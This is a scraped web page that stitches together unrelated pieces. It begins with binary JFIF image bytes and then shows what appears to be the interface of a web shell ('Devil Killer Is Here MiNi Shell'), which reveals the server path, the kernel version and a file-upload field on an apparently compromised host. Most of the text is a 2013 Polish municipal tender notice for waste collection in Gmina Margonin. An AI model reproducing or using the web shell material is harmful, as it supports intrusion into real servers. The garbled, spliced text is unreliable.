JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130514/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130514/75915-N-2013.html

<p class="kh_header"><b>Margonin: Świadczenie usługi odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Margonin.</b><br>
<b>Numer ogłoszenia: 75915 - 2013; data zamieszczenia: 14.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy Margonin , ul. Kościuszki 13, 64-830 Margonin, woj. wielkopolskie, tel. 067 2846068, faks (067) 284 72 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.margonin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Margonin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1. Przedmiotem zamówienia jest świadczenie usługi odbioru i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Margonin. 

Wykonawca zobowiązany jest do odbierania z terenu nieruchomości, na których zamieszkują mieszkańcy, wszystkich odpadów komunalnych, w tym niesegregowanych (zmieszanych) odpadów komunalnych (20 03 01) (w tym żużel i popiół z pieców centralnego ogrzewania, pieców kaflowych lub innych źródeł ciepła) i selektywnie zbieranych oraz odpadów określonych w Uchwale XXIII/226/2012
Rady Miasta i Gminy w Margoninie z dnia 7 listopada 2012 roku w sprawie regulaminu utrzymania czystości i porządku na terenie miasta i gminy Margonin oraz Uchwale Nr XXIII/230/2012 Rady Miasta i Gminy w Margoninie z dnia 7 listopada 2012 roku w sprawie ustalenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy.
Wykonawca przygotowując ofertę zobowiązany jest uwzględnić:
I. poszczególne grupy odpadów:
a) odpady niesegregowane zmieszane (20 03 01) (w tym żużel i popiół z pieców centralnego ogrzewania, pieców kaflowych lub innych źródeł ciepła),
b) odpady segregowane - szkło (20 01 02), papier i tektura (20 01 01), tworzywa sztuczne (20 01 39), metale (20 01 40), 
c) odpady segregowane  - opakowania ze szkła
(15 01 07), opakowania z tworzyw sztucznych (15 01 02), opakowania z metali (15 01 04), opakowania wielomateriałowe (15 01 05), opakowania z papieru i tektury (15 01 01),
d) odpady segregowane - odpady kuchenne ulegające biodegradacji
(20 01 08), odpady ogrodowe i zielone (20 01 99, 20 02 01, 20 03 02),
e) odpady segregowane (niebezpieczne), przeterminowane leki cytotoksyczne i cytostatyczne (20 01 31) oraz inne leki niż 20 01 31 (20 01 32) i chemikalia (w tym m.in. zużyty olej i tłuszcze niejadalne, opakowania po nawozach sztucznych, worki po sianokiszonce, farby i lakiery, kleje, rozpuszczalniki):
- 20 01 13 - Rozpuszczalniki
- 20 01 14 - Kwasy
- 20 01 15 - Alkalia
- 20 01 17 - Odczynniki fotograficzne
- 20 01 19 - Środki ochrony roślin I i II klasy toksyczności (bardzo toksyczne i toksyczne np. herbicydy, insektycydy)
- 20 01 25 - Oleje i tłuszcze jadalne
- 20 01 26 - Oleje i tłuszcze inne niż wymienione w 20 01 25
- 20 01 27 - Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice zawierające substancje niebezpieczne
- 20 01 28 - Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice inne niż wymienione w 20 01 27
- 20 01 29 - Detergenty zawierające substancje niebezpieczne
- 20 01 30 - Detergenty inne niż wymienione w 20 01 29
- 20 01 80 - Środki ochrony roślin inne niż wymienione w 20 01 19
- 20 01 99 - Inne niewymienione frakcje zbierane w sposób selektywny
- 20 03 99 - Odpady komunalne niewymienione w innych podgrupach
f) zużyty sprzęt elektryczny i elektroniczny (20 01 35, 20 01 36),  meble i inne odpady wielkogabarytowe (20 03 07), zużyte opony (16 01 03), zużyte baterie i akumulatory (20 01 33), (20 01 34),
g) odpady budowlane powstałe w trakcie samodzielnego wykonywania robót przez właścicieli nieruchomości ( nie wymagające pozwolenia na budowę lub zgłoszenia robót budowlanych - zgodnie z ustawą Prawo budowlane) (20 03 99)
II. Wykonawca bezpłatnie użyczy Zamawiającemu pojemniki spełniające warunki  obowiązujących norm polsko-europejskich oraz dostarczy je pod wskazane adresy.
Wykaz pojemników stanowić będzie załącznik do umowy z wykonawcą. 
Zamawiający dopuszcza możliwość zmiany liczby pojemników ze względu na zmianę liczby osób, zamieszkujących nieruchomości, na których powstają odpady komunalne.
2.2. Sposób odbierania odpadów komunalnych powstałych na nieruchomościach zamieszkałych przez mieszkańców:
1. Niesegregowane (zmieszane) odpady komunalne, w tym żużel i popiół z pieców centralnego ogrzewania, pieców kaflowych lub innych źródeł ciepła (20 03 01).
Gromadzone w pojemnikach (kubłach) i workach (będących wyłącznie przedmiotem zamówienia) na odpady o pojemnościach: 120l, 240l, 1100l, opróżnianych przez Wykonawcę regularnie co dwa tygodnie. Pojemniki  i worki wystawiane będą przez właścicieli nieruchomości najpóźniej do godz. 7:00 w dniu wywozu w granicy nieruchomości lub bezpośrednio przy ogrodzeniu przed posesją, z wyjątkiem chodników lub innych miejsc przeznaczonych do ruchu pojazdów samochodowych oraz pieszych a także nieruchomości zamieszkania zbiorowego (zabudowa wielorodzinna) do których istnieje możliwość dojazdu do zbiorczych pojemników na odpady.
2. Odpady komunalne, segregowane gromadzone w pojemnikach (kubłach) lub/i w workach o pojemności min. 100 l, przeznaczonych na poszczególne frakcje odpadów, odbieranych regularnie co 2 miesiące. Pojemniki lub/i worki (worki będące przedmiotem zamówienia jak i worki własne) wystawiane będą przez właścicieli nieruchomości najpóźniej do godz. 7:00 w dniu wywozu w granicy nieruchomości lub bezpośrednio przy ogrodzeniu przed posesją, z wyjątkiem chodników lub innych miejsc przeznaczonych do ruchu pojazdów samochodowych oraz pieszych a także nieruchomości zamieszkania zbiorowego (zabudowa wielorodzinna) do których istnieje możliwość dojazdu do zbiorczych pojemników na odpady.
Do grupy segregowanych odpadów komunalnych należą:
1) szkło (20 01 02) oraz opakowania ze szkła (15 01 07);
2)	
a) tworzywa sztuczne (20 01 39) oraz opakowania z tworzyw sztucznych (15 01 02);
a) metale (20 01 40) oraz opakowania z metali (15 01 04);
b) tworzywa sztuczne (20 01 39) oraz opakowania z tworzyw sztucznych (15 01 02);
c) opakowania wielomateriałowe (15 01 05);
- zbierane łącznie.
3. Odpady komunalne, segregowane jak:
1) odpady kuchenne ulegające biodegradacji (20 01 08); odpady ogrodowe i zielone(20 01 99, 20 02 01, 20 03 02)
Gromadzone w pojemnikach (kubłach) lub/i w workach o pojemności min. 100 l, odbieranych regularnie co miesiąc w miesiącach od kwietnia do listopada włącznie).
Pojemniki lub/i worki (worki będące przedmiotem zamówienia jak i worki własne) wystawiane będą przez właścicieli nieruchomości najpóźniej
do godz. 7:00 w dniu wywozu w granicy nieruchomości lub bezpośrednio
przy ogrodzeniu przed posesją, z wyjątkiem chodników lub innych miejsc przeznaczonych do ruchu pojazdów samochodowych oraz pieszych a także nieruchomości zamieszkania zbiorowego (zabudowa wielorodzinna) do których istnieje możliwość dojazdu do zbiorczych pojemników na odpady.
2) a) zużyte baterie i akumulatory (20 01 33, 20 01 34);
b) przeterminowane leki cytotoksyczne i cytostatyczne (20 01 31) oraz inne leki 
niż 20 01 31 (20 01 32) i chemikalia (w tym m.in. zużyty olej i tłuszcze niejadalne, opakowania po nawozach sztucznych, worki po sianokiszonce, farby i lakiery, kleje, rozpuszczalniki):
- 20 01 13 - Rozpuszczalniki
- 20 01 14 - Kwasy
- 20 01 15 - Alkalia
- 20 01 17 - Odczynniki fotograficzne
- 20 01 19 - Środki ochrony roślin I i II klasy toksyczności (bardzo toksyczne i toksyczne np. herbicydy, insektycydy)
- 20 01 25 - Oleje i tłuszcze jadalne
- 20 01 26 - Oleje i tłuszcze inne niż wymienione w 20 01 25
- 20 01 27 - Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice zawierające substancje niebezpieczne
- 20 01 28 - Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice inne niż wymienione w 20 01 27
- 20 01 29 - Detergenty zawierające substancje niebezpieczne
- 20 01 30 - Detergenty inne niż wymienione w 20 01 29
- 20 01 80 - Środki ochrony roślin inne niż wymienione w 20 01 19
- 20 01 99 - Inne niewymienione frakcje zbierane w sposób selektywny
- 20 03 99 - Odpady komunalne niewymienione w innych podgrupach
c) zużyty sprzęt elektryczny i elektroniczny (20 01 35, 20 01 36);
d) meble i inne odpady wielkogabarytowe (20 03 07);
e) zużyte opony (16 01 03);
f)  odpady budowlane powstałe w trakcie samodzielnego wykonywania robót przez właścicieli nieruchomości ( nie wymagające pozwolenia na budowę lub zgłoszenia robót budowlanych - zgodnie z ustawą Prawo budowlane) (20 03 99)
- powyższe odpady odbierane będą przez Wykonawcę dwa razy w roku
(w miesiącu marcu lub kwietniu oraz w październiku lub listopadzie) poprzez mobilny punkt zbierania odpadów komunalnych (tzw. gratowóz).
Odpady te będą wystawiane przez właścicieli nieruchomości najpóźniej do godz. 7:00 w dniu wywozu, przy wjeździe na nieruchomość w workach, pojemnikach
lub bez umieszczania ich w jakichkolwiek pojemnikach.
2.3. Szczegółowe wymagania stawiane przedsiębiorcom świadczącym usługi odbierania
i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Margonin.
1) Wykonawca zobowiązany jest do odbierania wszystkich odpadów komunalnych
od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Margonin, zgodnie z wykazem będącym załącznikiem do umowy. Załączone wykazy będą miały charakter informacyjny, mogą więc zmieniać się w trakcie trwania umowy oraz mogą nie odzwierciedlać rzeczywistego stanu na dzień zawarcia umowy.
2) Wykonawca zobowiązany jest zbierać odpady w taki sposób, aby nie dopuścić do zmieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości - zgodnie z art. 9e ust.2 ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tekst jednolity: Dz. U. z 2012 roku, poz. 391 ze zmianami),
3) Wykonawca zobowiązany jest do odbioru odpadów z posesji niezależnie od standardu jakościowego dróg przy których się one znajdują oraz niezależnie od odległości posesji od pierwszej linii zabudowy.
4) Ze względu na nie przejezdność dróg, niemożliwy będzie odbiór
i wywóz odpadów z nieruchomości w terminie przewidzianym w harmonogramie, Wykonawca zobowiązany jest do ich odbioru w terminie do 2 dni od dnia, w którym został poinformowany przez Zamawiającego bądź właściciela nieruchomości, że droga stała się przejezdną w takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy.
5) Wykonawca zobowiązany jest poinformować Zamawiającego o każdym przypadku niemożności odebrania odpadów z danej nieruchomości ze względu na brak współdziałania właściciela tej nieruchomości, np. w przypadku gdy przez okres 2 miesięcy właściciel nie wystawia pojemnika z odpadami w terminach określonych w harmonogramie.
6) Wykonawca zobowiązany jest do opracowania harmonogramu odbierania odpadów,
z uwzględnieniem poszczególnych rodzajów odpadów;
7) Harmonogram co do treści i formy wymaga akceptacji przez Zamawiającego. Wykonawca przedstawi Zamawiającemu harmonogram w terminie do 3 dni po podpisaniu umowy. 
Zamawiający zaakceptuje harmonogram lub przedstawi uwagi do niego w terminie do 3 dni od dnia jego otrzymania. Wykonawca w terminie 3 dni wprowadzi uwagi Zamawiającego oraz przedstawi go do ponownej akceptacji. 
8) Wykonawca w wyjątkowych sytuacjach odbierze na zgłoszenie Zamawiającego odpady poza ustalonym harmonogramem, jeżeli odpady te zostaną zebrane i zgromadzone na nieruchomości w terminach innych niż przewiduje termin ich odbioru, a zagraża to bezpieczeństwu życia i zdrowia mieszkańców.  
9) Wykonawca zaopatrzy wszystkich obsługiwanych właścicieli nieruchomości,
w harmonogramy zbiórki odpadów uwzględniając następujące wymogi:
- dla każdego właściciela nieruchomości - 1 egzemplarz w formie papierowej;
- harmonogram powinien być dostarczony najpóźniej do dnia 25.06.2013r.
- w przypadku nowo zgłoszonej nieruchomości Wykonawca zaopatrzy tę nieruchomość
w harmonogram odbierania odpadów w trakcie pierwszego odbioru odpadów;
- harmonogram przygotowany zostanie na cały okres obowiązywania umowy.   wystarczającym dla obowiązku doręczenia harmonogramu będzie włożenie go do skrzynek pocztowych każdej nieruchomości;
- Wykonawca winien umieścić harmonogram na własnej stronie internetowej i eksponować go przez cały okres na jaki został przygotowany;
- harmonogram nie powinien zawierać żadnych dodatkowych treści ponad informacje związane z wykonywaniem zamówienia, w szczególności reklam, informacji propagandowych itd. Dopuszcza się wypisanie w harmonogramie danych adresowych i kontaktowych Wykonawcy jaki i Zamawiającego.
- w przypadku nieprzewidzianych okoliczności dopuszcza się zmianę terminu odbioru odpadów za zgodą Zamawiającego. Wykonawca odpowiedzialny będzie w takim przypadku do indywidualnego poinformowania właścicieli nieruchomości których zmiana dotyczy;
10) Odbiór odpadów powinien odbywać się w dni powszednie oraz soboty z wyłączeniem świąt w  godz. 7:00 - 22:00.
11) W przypadku gdy ustalony dzień tygodnia  lub miesiąca dla odbioru odpadów przypada w dniu ustawowo wolnym od pracy, Wykonawca zapewni odbiór odpadów w następnym dniu ie będącym dniem ustawowo wolnym od pracy;
12) Wykonawca zapewni regularność i powtarzalność odbierania, tak aby mieszkańcy mogli w łatwy sposób zaplanować przygotowanie odpadów do odebrania
13) Wykonawca bezpłatnie użyczy Zamawiającemu pojemniki spełniające warunki  obowiązujących norm polsko-europejskich oraz dostarczy je pod wskazane adresy.
14) Wykonawca będzie odbierał odpady z pojemników, będących własnością właścicieli nieruchomości, na których zamieszkują mieszkańcy, spełniających warunki obowiązujących norm polsko-europejskiej.
15) Wykonawca zobowiązany jest do dostarczenia nieodpłatnie właścicielom nieruchomości nieograniczonej ilości worków o odpowiedniej wytrzymałości i pojemności, przeznaczonych
do selektywnej zbiórki odpadów, według następujących zasad:
- Wykonawca zaopatrywać będzie nieruchomości w worki na odpady każdorazowo w trakcie odbioru selektywnie zbieranych odpadów komunalnych;
- pierwsze worki pakiet startowy na odpady segregowane, w ilości po 4 szt. należy dostarczyć do każdej nieruchomości do 25.06.2013roku;
- Wykonawca zobowiązany jest do dostarczenia do Urzędu Miasta i Gminy Margonin 300 szt. worków na odpady segregowane,
- Wykonawca zobowiązany jest do dostarczenia do Urzędu Miasta i Gminy Margonin 2.500 szt. worków pojemności 120 l. na niesegregowane (zmieszane) odpady komunalne,
- Wykonawca zobowiązany jest do bieżącego uzupełniania stanu ilościowego dostępnych
w Urzędzie Miasta i Gminy Margonin worków,
- worki do selektywnej zbiórki odpadów powinny posiadać widoczny nadruk obejmujący  w szczególności:
a) napisy o frakcji odpadów w nich zbieranych z opisem co można do niego wrzucać,
b) oznaczenie (nazwa i siedziba) Zamawiającego,
c) wzór nadruku na workach wymaga akceptacji Zamawiającego,
- worki powinny być przeźroczyste, o grubości zapobiegającej pęknięciu lub rozerwaniu.
- w przypadku przejściowego braku worków w kolorze (określonym w Uchwale
Nr XXIII/226/2012 Rady Miasta i Gminy w Margoninie z dnia 7 listopada 2012 roku
w sprawie regulaminu utrzymania czystości i porządku na terenie miasta i gminy Margonin) dopuszcza się umieszczenie odpadów w innych workach dostarczonych przez Wykonawcę.
- dopuszcza się zbieranie odpadów segregowanych i biodegradowanych w workach
właścicieli nieruchomości, na których zamieszkują mieszkańcy, które odbierze Wykonawca zgodnie z harmonogramem zbiórki, bez względu na ilość,
- odbiór odpadów niesegregowanych ( zmieszanych) składowanych w workach wyłącznie w workach będących przedmiotem zamówienia.
16) Wykonawca zobowiązany jest do wyposażania pracowników zajmujących się odbiorem w odzież ochronną z widocznym logo firmy oraz w identyfikatory, począwszy od dnia poprzedzającego dzień rozpoczęcia świadczenia usługi,
17) Wykonawca ponosi całkowitą odpowiedzialność za odbiór i zagospodarowanie odpadów komunalnych zgodnie z obowiązującymi przepisami i normami. Dotyczy to między innymi przeładunku, transportu, odzysku, unieszkodliwiania oraz wszelkich spraw formalno - prawnych związanych ze zbieraniem, transportem, odzyskiem, czy unieszkodliwianiem lub przekazaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.
18) Wykonawca ponosi pełną odpowiedzialność za szkody wyrządzone podczas wykonywania przedmiotu zamówienia.
19) W przypadku, gdy Wykonawca spowodował uszkodzenie bądź zniszczenie pojemnika (kubła) na odpady, zobowiązany jest dany pojemnik naprawić lub wymienić na wolny od wad.
20) W przypadku innych szkód (np.: w drodze, ogrodzeniu, budynku, itp.) Wykonawca zobowiązany jest do naprawienia wyrządzonej szkody na zasadach ogólnych Kodeksu Cywilnego oraz ustalonych w porozumieniu z właścicielem nieruchomości.
21) Wykonawca zobowiązany jest do spełnienia wymagań określonych w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 roku, poz. 122).
22) Wykonawca zobowiązany jest do przechowywania w siedzibie Wykonawcy, przez okres 2 lat od dnia ich zapisania, danych pochodzących z monitoringu, o których mowa w § 5 ust 1 pkt. 2) rozporządzenia Ministra Środowiska w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych. Wykonawca powinien posiadać odpowiedni program umożliwiający odczyt, prezentację oraz weryfikację przechowywanych danych. Dane będą udostępniane, na każde żądanie Zamawiającego.
23) Wykonawca zobowiązany jest do realizacji reklamacji (nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, nie pozostawienie worków na odpady segregowane, itp.) w przeciągu 24 godzin od otrzymania zawiadomienia e-mailem od Zamawiającego. Załatwienie reklamacji należy niezwłocznie potwierdzić na e-mail Zamawiającego.
24) Wykonawca zobowiązany jest do osiągnięcia poziomów:
a) recyklingu i przygotowania do ponownego użycia następujących frakcji odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła,
b) recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych,
- określonych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 roku, poz. 645),
c) ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych
do składowania,
- określonych w Rozporządzeniu Ministra Środowiska w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 roku, poz. 676),
25) Wykonawca zobowiązany jest do przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 roku o odpadach (Dz. U. z 2013 roku, poz.21).
26) W przypadku gdy odpady komunalne zmieszane są gromadzone niezgodnie z regulaminem (np. poza pojemnikiem, w pojemniku niezgodnym z regulaminem, lub w niedopuszczonym worku) Wykonawca odbierze odpady oraz powiadomi gminę o działaniu właściciela nieruchomości niezgodnym z regulaminem.
27) Wykonawca jest zobowiązany do przekazywania odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania, do regionalnej instalacji
do przetwarzania odpadów komunalnych wskazanej w Uchwale nr XXV/441/12
Sejmiku Województwa Wielkopolskiego z dnia 27 sierpnia 2012 roku w sprawie wykonania Planu gospodarki odpadami dla województwa wielkopolskiego na lata 2012-2017.
28) Wykonawca zobowiązany jest do redukcji masy odpadów komunalnych ulegających biodegradacji kierowanych do składowania - do poziomów wymaganych w ustawie
o utrzymaniu czystości i porządku w gminach. Sposób obliczenia poziomu ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania został określony w Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 roku  w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz. U. z 2012roku, poz. 676).
2.4. Standard sanitarny wykonywania usług oraz ochrony środowiska
1) Wykonawca odbierający odpady komunalne zobowiązany jest do zapewnienia,
aby pojazdy i urządzenia były zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich gromadzenia, przeładunku, a także transportu.
2) Wykonawca odbierający odpady komunalne zobowiązany jest do uporządkowania terenu
w przypadku jego zanieczyszczenia w trakcie załadunku odpadów na pojazd.
3) Wykonawca zobowiązany jest do utrzymywania odpowiedniego stanu sanitarnego pojazdów
i urządzeń do odbierania odpadów komunalnych
4) Wykonawca zobowiązany jest do zbierania odpadów leżących luzem obok zapełnionych pojemników, kontenerów lub worków oraz zobowiązany jest do doprowadzenia do porządku terenów przyległych, zanieczyszczonych wskutek przepełnienia ww. urządzeń (pojemników) służących do gromadzenia odpadów. Obowiązek ten winien być realizowany niezwłocznie
po opróżnieniu pojemników.
2.5. Obowiązek prowadzenia dokumentacji, sprawozdawczości związanej z działalnością objętą zamówieniem.
1) Wykonawca zobowiązany jest do bieżącego prowadzenia ilościowej i jakościowej ewidencji (kartotek) odpadów odbieranych od właścicieli nieruchomości zamieszkałych, zgodnie
z przepisami Ustawy o odpadach oraz Ustawy o otrzymaniu czystości i porządku w gminach.
2) Wykonawca zobowiązany jest do powiadomienia Zamawiającego, najpóźniej w następnym dniu po zajściu zdarzenia, o każdej odmówionej realizacji odbioru odpadów z terenu nieruchomości, wraz z uzasadnieniem.
3) Wykonawca zobowiązany jest do prowadzenia dokumentacji związanej z działalnością objętą zamówieniem, tj. sporządzanie i przekazywanie Zamawiającemu kwartalnych sprawozdań w terminie do końca miesiąca następującego po kwartale, którego dotyczy - zgodnie z art. 9ni art. 9t ustawy o utrzymania czystości i porządku w gminach wraz z kartami przekazania odpadów (oddzielnie dla każdej frakcji odpadu komunalnego) według wzoru określonego w Rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 roku w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012, poz. 630 ze zmianami).
4) Wykonawca zobowiązany jest do przekazywania Zamawiającemu kwartalnych raportów
o osiągniętych poziomach recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazanych do składowania. Wykonawca do każdego sprawozdania kwartalnego dołączy kopie dokumentów potwierdzających osiągnięcie określonych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazanych do składowania.
5) Wykonawca zgodnie z art. 9p ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (Dz. U. 2012 roku, poz. 391) zobowiązany jest na prośbę Zamawiającego do okazania dokumentów sporządzonych na potrzeby ewidencji odpadów.
6) Raporty określone w pkt. 2.5.2) i 2.5.3) i 2.5.4) będą  przekazywane w formie elektronicznej i papierowej
